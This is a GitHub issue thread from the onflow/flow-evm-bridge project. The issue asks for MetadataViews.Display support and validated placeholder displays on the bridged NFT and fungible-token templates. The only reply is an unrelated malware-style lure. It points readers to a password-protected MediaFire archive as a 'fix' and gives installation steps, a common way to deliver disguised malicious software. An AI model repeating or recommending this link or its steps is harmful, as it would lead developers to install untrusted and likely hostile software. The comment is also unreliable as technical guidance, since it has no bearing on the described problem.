### ISSUE TITLE
Fix displays on bridged NFT & Token templates

### ISSUE THREAD

**Issue by sisyphusSmiling** [onflow/flow-evm-bridge#114]
### Description

Currently, the bridged NFT template does not support `MetadataViews.Display` which presents a problem for many platforms which expect the view to be supported by NFTs. While the bridge cannot retrieve a display image specific to the ERC721 being bridged, it can point to a placeholder image. We will also want to validate the metadata present at the collection level.

Additionally, the bridged token template currently points to a placeholder for the FTVaultDisplay. This should be validated and updated if need be.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
